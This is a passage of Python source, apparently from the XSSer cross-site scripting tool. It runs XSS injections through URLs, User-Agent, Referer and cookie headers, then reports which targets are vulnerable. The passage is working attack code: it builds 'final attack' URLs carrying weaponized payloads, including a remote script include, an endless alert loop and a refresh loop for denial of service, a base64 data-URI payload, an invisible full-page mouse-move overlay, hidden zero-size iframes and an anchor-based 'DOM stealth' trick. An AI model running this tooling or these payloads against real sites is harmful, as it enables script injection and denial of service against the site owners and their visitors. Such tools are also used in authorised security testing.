  2715. 

  2716.         # step 4: perform attack
    2717. 

  2717.         self.try_running(self.attack, "\n[Error] Internal problems running attack...\n", (urls, payloads, query_string))
    2718. 

  2718.         for reporter in self._reporters:
    2719. 

  2719.             reporter.report_state('reporting')
    2720. 

  2720.         if len(self.final_attacks):
    2721. 

  2721.             self.report("[Info] Waiting for tokens to arrive...")
    2722. 

  2722.         while self._ongoing_requests and not self._landing:
    2723. 

  2723.             if not self.pool:
    2724. 

  2724.                 self.mothership.poll_workers()
    2725. 

  2725.             else:
    2726. 

  2726.                 self.poll_workers()
    2727. 

  2727.             time.sleep(0.2)
    2728. 

  2728.             for reporter in self._reporters:
    2729. 

  2729.                 reporter.report_state('final sweep...')
    2730. 

  2730.         if self.pool:
    2731. 

  2731.             self.pool.dismissWorkers(len(self.pool.workers))
    2732. 

  2732.             self.pool.joinAllDismissedWorkers()
    2733. 

  2733.         start = time.time()
    2734. 

  2734.         while not self._landing and len(self.final_attacks) and time.time() - start < 5.0:
    2735. 

  2735.             time.sleep(0.2)
    2736. 

  2736.             for reporter in self._reporters:
    2737. 

  2737.                 reporter.report_state('landing... '+str(int(5.0 - (time.time() - start))))
    2738. 

  2738.         if self.final_attacks:
    2739. 

  2739.             self.report("-"*25+"\n")
    2740. 

  2740.             self.report("[Info] Generating 'token' url:\n")
    2741. 

  2741.             for final_attack in self.final_attacks.values():
    2742. 

  2742.                 if not final_attack['url'] == None:
    2743. 

  2743.                     self.report(final_attack['url'] , "\n")
    2744. 

  2744.                 self.report("="*50+"\n")
    2745. 

  2745.                 self.report("[Info] CONGRATULATIONS!!! <-> This vector is doing a remote connection... So, is: 100% VULNERABLE! ;-)\n")
    2746. 

  2746.                 self.report(",".join(self.successful_urls), "\n")
    2747. 

  2747.                 self.report("="*50 + "\n")
    2748. 

  2748.         for reporter in self._reporters:
    2749. 

  2749.             reporter.end_attack()
    2750. 

  2750.         self.report("="*50)
    2751. 

  2751.         if self.mothership:
    2752. 

  2752.             self.mothership.remove_reporter(self)
    2753. 

  2753.             self.report("Mosquito(es) landed!")
    2754. 

  2754.         else:
    2755. 

  2755.             self.report("Mosquito(es) landed!")
    2756. 

  2756.         self.report("="*50)
    2757. 

  2757.         self.print_results()
    2758. 

  2758. 

  2759.     def sanitize_urls(self, urls):
    2760. 

  2760.         all_urls = set()
    2761. 

  2761.         if urls is not None:
    2762. 

  2762.             for url in urls:
    2763. 

  2763.                 if url.startswith("http://") or url.startswith("https://"):
    2764. 

  2764.                     self.urlspoll.append(url)
    2765. 

  2765.                     all_urls.add(url)
    2766. 

  2766.                 else:
    2767. 

  2767.                     if self.options.crawling:
    2768. 

  2768.                         self.report("[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
    2769. 

  2769.                     else:
    2770. 

  2770.                         self.report("\n[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
    2771. 

  2771.                     url = None
    2772. 

  2772.         else:
    2773. 

  2773.             self.report("\n[Error] Not any valid source provided to start a test... Aborting!\n")
    2774. 

  2774.         return all_urls
    2775. 

  2775. 

  2776.     def land(self, join=False):
    2777. 

  2777.         self._landing = True
    2778. 

  2778.         if self.hub:
    2779. 

  2779.             self.hub.shutdown()
    2780. 

  2780.             if join:
    2781. 

  2781.                 self.hub.join()
    2782. 

  2782.                 self.hub = None
    2783. 

  2783. 

  2784.     def _prepare_extra_attacks(self, payload):
    2785. 

  2785.         """
    2786. 

  2786.         Setup extra attacks.
    2787. 

  2787.         """
    2788. 

  2788.         options = self.options
    2789. 

  2789.         agents = [] # user-agents
    2790. 

  2790.         try:
    2791. 

  2791.             f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
    2792. 

  2792.         except:
    2793. 

  2793.             f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
    2794. 

  2794.         for line in f:
    2795. 

  2795.             agents.append(line)
    2796. 

  2796.         extra_agent = random.choice(agents).strip() # set random user-agent
    2797. 

  2797.         extra_referer = "127.0.0.1"
    2798. 

  2798.         extra_cookie = None
    2799. 

  2799.         if self.options.script:
    2800. 

  2800.             if 'XSS' in payload['payload']:
    2801. 

  2801.                 payload['payload'] = payload['payload'].replace("XSS","PAYLOAD")
    2802. 

  2802.         if 'PAYLOAD' in payload['payload'] or 'XSS' in payload['payload']:
    2803. 

  2803.             if options.xsa:
    2804. 

  2804.                 hashing = self.generate_hash('xsa')
    2805. 

  2805.                 agent = payload['payload'].replace('PAYLOAD', hashing)
    2806. 

  2806.                 self._ongoing_attacks['xsa'] = hashing
    2807. 

  2807.                 self.xsa_injection = self.xsa_injection + 1
    2808. 

  2808.                 self.options.agent = agent
    2809. 

  2809.                 extra_agent = agent
    2810. 

  2810.                 self.extra_hashed_injections[hashing] = "XSA", payload['payload']
    2811. 

  2811.             if options.xsr:
    2812. 

  2812.                 hashing = self.generate_hash('xsr')
    2813. 

  2813.                 referer = payload['payload'].replace('PAYLOAD', hashing)
    2814. 

  2814.                 self._ongoing_attacks['xsr'] = hashing
    2815. 

  2815.                 self.xsr_injection = self.xsr_injection + 1
    2816. 

  2816.                 self.options.referer = referer
    2817. 

  2817.                 extra_referer = referer
    2818. 

  2818.                 self.extra_hashed_injections[hashing] = "XSR", payload['payload']
    2819. 

  2819.             if options.coo:
    2820. 

  2820.                 hashing = self.generate_hash('cookie')
    2821. 

  2821.                 cookie = payload['payload'].replace('PAYLOAD', hashing)
    2822. 

  2822.                 self._ongoing_attacks['coo'] = hashing
    2823. 

  2823.                 self.coo_injection = self.coo_injection + 1
    2824. 

  2824.                 self.options.cookie = cookie
    2825. 

  2825.                 extra_cookie = cookie
    2826. 

  2826.                 self.extra_hashed_injections[hashing] = "COO", payload['payload']
    2827. 

  2827.         return extra_agent, extra_referer, extra_cookie
    2828. 

  2828. 

  2829.     def attack(self, urls, payloads, query_string):
    2830. 

  2830.         """
    2831. 

  2831.         Perform an attack on the given urls with the provided payloads and
    2832. 

  2832.         query_string.
    2833. 

  2833.         """
    2834. 

  2834.         for url in urls:
    2835. 

  2835.             if self.pool:
    2836. 

  2836.                 self.poll_workers()
    2837. 

  2837.             else:
    2838. 

  2838.                 self.mothership.poll_workers()
    2839. 

  2839.             if not self._landing:
    2840. 

  2840.                 self.attack_url(url, payloads, query_string)
    2841. 

  2841. 

  2842.     def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url):
    2843. 

  2843.         """
    2844. 

  2844.         Generate a real attack url by using data from a successful test.
    2845. 

  2845. 

  2846. 	    This method also applies DOM stealth mechanisms.
    2847. 

  2847.         """
    2848. 

  2848.         user_attack_payload = payload['payload']
    2849. 

  2849.         if self.options.finalpayload:
    2850. 

  2850.             user_attack_payload = self.options.finalpayload
    2851. 

  2851.         elif self.options.finalremote:
    2852. 

  2852.             user_attack_payload = '<script src="' + self.options.finalremote + '"></script>'
    2853. 

  2853.         elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Data Control Protocol Injection]":
    2854. 

  2854.             user_attack_payload = '<a href="data:text/html;base64,' + b64encode(self.options.finalpayload) + '></a>'
    2855. 

  2855.         elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Induced Injection]":
    2856. 

  2856.             user_attack_payload = self.options.finalpayload
    2857. 

  2857.         if self.options.dos:
    2858. 

  2858.             user_attack_payload = '<script>for(;;)alert("You were XSSed!!");</script>'
    2859. 

  2859.         if self.options.doss:
    2860. 

  2860.             user_attack_payload = '<meta%20http-equiv="refresh"%20content="0;">'
    2861. 

  2861.         if self.options.b64:
    2862. 

  2862.             user_attack_payload = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4">'
    2863. 

  2863.         if self.options.onm:
    2864. 

  2864.             user_attack_payload = '"style="position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px" onMouseMove="' + user_attack_payload
    2865. 

  2865.         if self.options.ifr:
    2866. 

  2866.             user_attack_payload = '<iframe src="' + user_attack_payload + '" width="0" height="0"></iframe>'
    2867. 

  2867.         do_anchor_payload = self.options.anchor
    2868. 

  2868.         anchor_data = None
    2869. 

  2869.         attack_hash = None
    2870. 

  2870.         if do_anchor_payload: # DOM Shadows!
    2871. 

  2871.             dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
    2872. 

  2872.             dest_url = dest_url.replace('?', '#')
    2873. 

  2873.         else:
    2874. 

  2874.             dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
    2875. 

  2875.         if attack_hash:
    2876. 

  2876.             self.final_attacks[attack_hash] = {'url':dest_url}
    2877. 

  2877.         return dest_url
    2878. 

  2878. 

  2879.     def token_arrived(self, attack_hash):
    2880. 

  2880.         if not self.mothership:
    2881. 

  2881.             # only the mothership calls on token arriving.
    2882. 

  2882.             self.final_attack_callback(attack_hash)
    2883. 

  2883. 

  2884.     def final_attack_callback(self, attack_hash):
    2885. 

  2885.         if attack_hash in self.final_attacks:
    2886. 

  2886.             dest_url = self.final_attacks[attack_hash]['url']
    2887. 

  2887.             self.report('[*] Browser check:', dest_url)
    2888. 

  2888.             for reporter in self._reporters:
    2889. 

  2889.                 reporter.add_checked(dest_url)
    2890. 

  2890.             if self._reporter:
    2891. 

  2891.                 from twisted.internet import reactor
    2892. 

  2892.                 reactor.callFromThread(self._reporter.post, 'SUCCESS ' + dest_url)
    2893. 

  2893.             self.final_attacks.pop(attack_hash)
    2894. 

  2894. 

  2895.     def apply_postprocessing(self, dest_url, description, method, hashing, query_string, payload, orig_url):
    2896. 

  2896.         real_attack_url = self.generate_real_attack_url(dest_url, description, method, hashing, query_string, payload, orig_url)
    2897. 

  2897.         #generate_shorturls = self.options.shorturls
    2898. 

  2898.         #if generate_shorturls:
    2899. 

  2899.         #    shortener = ShortURLReservations(self.options.shorturls)
    2900. 

  2900.         #    if self.options.finalpayload or self.options.finalremote or self.options.b64 or self.options.dos:
    2901. 

  2901.         #        shorturl = shortener.process_url(real_attack_url)
    2902. 

  2902.         #        self.report("[/] Shortered URL (Final Attack):", shorturl)
    2903. 

  2903.         #    else:
    2904. 

  2904.         #        shorturl = shortener.process_url(dest_url)
    2905. 

  2905.         #        self.report("[/] Shortered URL (Injection):", shorturl)
    2906. 

  2906.         return real_attack_url
    2907. 

  2907. 

  2908.     def report(self, *args):
    2909. 

  2909.         args = list([str(s) for s in args])
    2910. 

  2910.         formatted = " ".join(args)
    2911. 

  2911.         if not self.options.silent:
    2912. 

  2912.             print(formatted)
    2913. 

  2913.         for reporter in self._reporters:
    2914. 

  2914.             reporter.post(formatted)
    2915. 

  2915. 

  2916.     def print_results(self):
    2917. 

  2917.         """
    2918. 

  2918.         Print results from attack.
    2919. 

  2919.         """
    2920. 

  2920.         self.report('\n' + '='*75)
    2921. 

  2921.         total_injections = len(self.hash_found) + len(self.hash_notfound)
    2922. 

  2922.         if len(self.hash_found) + len(self.hash_notfound) == 0:
    2923. 

  2923.             pass
    2924. 

  2924.         elif self.options.heuristic: 
    2925. 

  2925.             pass
    2926. 

  2926.         else:
    2927. 

  2927.             self.report("[*] Final Results:")
    2928. 

  2928.             self.report('='*75 + '\n')
    2929. 

  2929.             self.report("- Injections:", total_injections)
    2930. 

  2930.             self.report("- Failed:", len(self.hash_notfound))
    2931. 

  2931.             self.report("- Successful:", len(self.hash_found))
    2932. 

  2932.             try:
    2933. 

  2933.                 _accur = len(self.hash_found) * 100 / total_injections
    2934. 

  2934.             except ZeroDivisionError:
    2935. 

  2935.                 _accur = 0
    2936. 

  2936.             self.report("- Accur: %s %%\n" % _accur)
    2937. 

  2937.             if not len(self.hash_found) and self.hash_notfound:
    2938. 

  2938.                 self.report('='*75 + '\n')
    2939. 

  2939.                 pass
    2940. 

  2940.             else:
    2941. 

  2941.                 self.report('='*75)
    2942. 

  2942.                 self.report("[*] List of XSS injections:")
    2943. 

  2943.                 self.report('='*75 + '\n')
    2944. 

  2944.                 if self.options.reversecheck:
    2945. 

  2945.                     self.report("You have found: [ " + str(len(self.hash_found)) + " ] XSS vector(s)! -> [100% VULNERABLE]\n")
    2946. 

  2946.                 else:
    2947. 

  2947.                     self.report("You have found: [ " + str(len(self.hash_found)) + " ] possible (without --reverse-check) XSS vector(s)!\n")
    2948. 

  2948.                 self.report("---------------------" + "\n")
    2949. 

  2949.         if self.options.fileoutput:
    2950. 

  2950.             fout = open("XSSreport.raw", "w") # write better than append
    2951. 

  2951.         for line in self.hash_found:
    2952. 

  2952.             if self.options.heuristic or self.options.hash: # not final attack possible when checking
    2953. 

  2953.                 pass
    2954. 

  2954.             else:
    2955. 

  2955.                 attack_url = self.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
    2956. 

  2956.             if line[2] == "XSR":
    2957. 

  2957.                 self.xsr_found = self.xsr_found + 1
    2958. 

  2958.                 if len(self.hash_found) < 11:
    2959. 

  2959.                     if line[4]: # when query string
    2960. 

  2960.                         self.report("[+] Target:", line[6] + " | " + line[4])
    2961. 

  2961.                     else:
    2962. 

  2962.                         self.report("[+] Target:", line[6])
    2963. 

  2963.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    2964. 

  2964.                     self.report("[!] Method: Referer Injection")
    2965. 

  2965.                     self.report("[*] Hash:", line[3])
    2966. 

  2966.                     self.report("[*] Payload:", str(Curl.referer))
    2967. 

  2967.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    2968. 

  2968.                 if self.options.fileoutput:
    2969. 

  2969.                     fout.write("="*75)
    2970. 

  2970.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    2971. 

  2971.                     fout.write("="*75 + "\n\n")
    2972. 

  2972.                     for h in self.hash_found:
    2973. 

  2973.                         if h[2] == "XSR":
    2974. 

  2974.                             if h[4]:
    2975. 

  2975.                                 fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
    2976. 

  2976.                             else:
    2977. 

  2977.                                 fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
    2978. 

  2978.                         fout.write("="*75 + "\n\n")
    2979. 

  2979.             elif line[2] == "XSA":
    2980. 

  2980.                 self.xsa_found = self.xsa_found + 1
    2981. 

  2981.                 if len(self.hash_found) < 11:
    2982. 

  2982.                     if line[4]: # when query string
    2983. 

  2983.                         self.report("[+] Target:", line[6] + " | " + line[4])
    2984. 

  2984.                     else:
    2985. 

  2985.                         self.report("[+] Target:", line[6])
    2986. 

  2986.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    2987. 

  2987.                     self.report("[!] Method: User-Agent Injection")
    2988. 

  2988.                     self.report("[*] Hash:", line[3])
    2989. 

  2989.                     self.report("[*] Payload:", str(Curl.agent))
    2990. 

  2990.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    2991. 

  2991.                 if self.options.fileoutput:
    2992. 

  2992.                     fout.write("="*75)
    2993. 

  2993.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    2994. 

  2994.                     fout.write("="*75 + "\n\n")
    2995. 

  2995.                     for h in self.hash_found:
    2996. 

  2996.                         if h[2] == "XSA":
    2997. 

  2997.                             if h[4]:
    2998. 

  2998.                                 fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
    2999. 

  2999.                             else:
    3000. 

  3000.                                 fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
    3001. 

  3001.                         fout.write("="*75 + "\n\n")
    3002. 

  3002.             elif line[2] == "COO":
    3003. 

  3003.                 self.coo_found = self.coo_found + 1
    3004. 

  3004.                 if len(self.hash_found) < 11:
    3005. 

  3005.                     if line[4]: # when query string
    3006. 

  3006.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3007. 

  3007.                     else:
    3008. 

  3008.                         self.report("[+] Target:", line[6])
    3009. 

  3009.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    3010. 

  3010.                     self.report("[!] Method: Cookie Injection")
    3011. 

  3011.                     self.report("[*] Hash:", line[3])
    3012. 

  3012.                     self.report("[*] Payload:", str(Curl.cookie))
    3013. 

  3013.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    3014. 

  3014.                 if self.options.fileoutput:
    3015. 

  3015.                     fout.write("="*75)
    3016. 

  3016.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3017. 

  3017.                     fout.write("="*75 + "\n\n")
    3018. 

  3018.                     for h in self.hash_found:
    3019. 

  3019.                         if h[2] == "COO":
    3020. 

  3020.                             if h[4]:
    3021. 

  3021.                                 fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
    3022. 

  3022.                             else:
    3023. 

  3023.                                 fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
    3024. 

  3024.                         fout.write("="*75 + "\n\n")
    3025. 

  3025.             elif line[1] == "[Data Control Protocol Injection]":
    3026. 

  3026.                 self.dcp_found = self.dcp_found + 1
    3027. 

  3027.                 if len(self.hash_found) < 11:
    3028. 

  3028.                     if line[4]: # when query string
    3029. 

  3029.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3030. 

  3030.                     else:
    3031. 

  3031.                         self.report("[+] Target:", line[6])
    3032. 

  3032.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    3033. 

  3033.                     self.report("[!] Method: DCP")
    3034. 

  3034.                     self.report("[*] Hash:", line[3])
    3035. 

  3035.                     self.report("[*] Payload:", line[0])
    3036. 

  3036.                     self.report("[!] Vulnerable: DCP (Data Control Protocol)")
    3037. 

  3037.                     if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3038. 

  3038.                         self.report("[*] Final Attack:", attack_url)
    3039. 

  3039.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    3040. 

  3040.                 if self.options.fileoutput:
    3041. 

  3041.                     fout.write("="*75)
    3042. 

  3042.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3043. 

  3043.                     fout.write("="*75 + "\n\n")
    3044. 

  3044.                     for h in self.hash_found:
    3045. 

  3045.                         if h[4]:
    3046. 

  3046.                             if h[1] == "[Data Control Protocol Injection]":
    3047. 

  3047.                                 if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3048. 

  3048.                                     fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3049. 

  3049.                                 else:
    3050. 

  3050.                                     fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
    3051. 

  3051.                             else:
    3052. 

  3052.                                 if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3053. 

  3053.                                     fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3054. 

  3054.                                 else:
    3055. 

  3055.                                     fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
    3056. 

  3056.                         fout.write("="*75 + "\n\n")
    3057. 

  3057.             elif line[1] == "[Document Object Model Injection]":
    3058. 

  3058.                 self.dom_found = self.dom_found + 1 
    3059. 

  3059.                 if len(self.hash_found) < 11:
    3060. 

  3060.                     if line[4]: # when query string
    3061. 

  3061.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3062. 

  3062.                     else:
    3063. 

  3063.                         self.report("[+] Target:", line[6])
    3064. 

  3064.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    3065. 

  3065.                     self.report("[!] Method: DOM")
    3066. 

  3066.                     self.report("[*] Hash:", line[3])
    3067. 

  3067.                     self.report("[*] Payload:", line[0])
    3068. 

  3068.                     self.report("[!] Vulnerable: DOM (Document Object Model)")
    3069. 

  3069.                     if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3070. 

  3070.                         self.report("[*] Final Attack:", attack_url)
    3071. 

  3071.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    3072. 

  3072.                 if self.options.fileoutput:
    3073. 

  3073.                     fout.write("="*75)
    3074. 

  3074.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3075. 

  3075.                     fout.write("="*75 + "\n\n")
    3076. 

  3076.                     for h in self.hash_found:
    3077. 

  3077.                         if h[1] == "[Document Object Model Injection]":
    3078. 

  3078.                             if h[4]:
    3079. 

  3079.                                 if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3080. 

  3080.                                     fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3081. 

  3081.                                 else:
    3082. 

  3082.                                     fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
    3083. 

  3083.                             else:
    3084. 

  3084.                                 if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3085. 

  3085.                                     fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3086. 

  3086.                                 else:
    3087. 

  3087.                                     fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
    3088. 

  3088.                             fout.write("="*75 + "\n\n")
    3089. 

  3089.             elif line[1] == "[Induced Injection]":
    3090. 

  3090.                 self.httpsr_found = self.httpsr_found +1
    3091. 

  3091.                 if len(self.hash_found) < 11:
    3092. 

  3092.                     if line[4]: # when query string
    3093. 

  3093.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3094. 

  3094.                     else:
    3095. 

  3095.                         self.report("[+] Target:", line[6])
    3096. 

  3096.                     self.report("[+] Vector: [ " + str(line[2]) + " ]")
    3097. 

  3097.                     self.report("[!] Method: INDUCED")
    3098. 

  3098.                     self.report("[*] Hash:", line[3])
    3099. 

  3099.                     self.report("[*] Payload:", line[0])
    3100. 

  3100.                     self.report("[!] Vulnerable: HTTPsr ( HTTP Splitting Response)")
    3101. 

  3101.                     if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3102. 

  3102.                         self.report("[*] Final Attack:", attack_url)
    3103. 

  3103.                     self.report("[!] Status: XSS FOUND!",  "\n", '-'*50, "\n")
    3104. 

  3104.                 if self.options.fileoutput:
    3105. 

  3105.                     fout.write("="*75)
    3106. 

  3106.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3107. 

  3107.                     fout.write("="*75 + "\n\n")
    3108. 

  3108.                     for h in self.hash_found:
    3109. 

  3109.                         if h[4]:
    3110. 

  3110.                             if h[1] == "[Induced Injection]":
    3111. 

  3111.                                 if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3112. 

  3112.                                     fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3113. 

  3113.                                 else:
    3114. 

  3114.                                     fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
    3115. 

  3115.                             else:
    3116. 

  3116.                                 if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
    3117. 

  3117.                                     fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
    3118. 

  3118.                                 else:
    3119. 

  3119.                                     fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
    3120. 

  3120.                             fout.write("="*75 + "\n\n")
    3121. 

  3121.             elif line[1] == "[hashing check]":
    3122. 

  3122.                 if len(self.hash_found) < 11:
    3123. 

  3123.                     if line[4]:
    3124. 

  3124.                         self.report("[+] Target:", line[6] + " | " + line[4])
    3125. 

  3125.                     else:
    3126. 

  3126.                         self.report("[+] Target:", line[6])
    3127. 

  3127.                     self.report("[+] Vector: [ " + str(line[3]) + " ]")
    3128. 

  3128.                     self.report("[!] Method:", line[2])
    3129. 

  3129.                     self.report("[*] Payload:", line[5])
    3130. 

  3130.                     self.report("[!] Status: HASH FOUND!",  "\n", '-'*50, "\n")
    3131. 

  3131.                 if self.options.fileoutput:
    3132. 

  3132.                     fout.write("="*75)
    3133. 

  3133.                     fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
    3134. 

  3134.                     fout.write("="*75 + "\n\n")
    3135. 

  3135.                     for h in self.hash_found:
    3136. 

  3136.                         if h[1] == "[hashing check]":
    3137. 

  3137.                             if h[4]:
    3138. 

  3138.                                 fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
    3139. 

  3139.                             else:
    3140. 

  3140.                                 fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
    3141. 

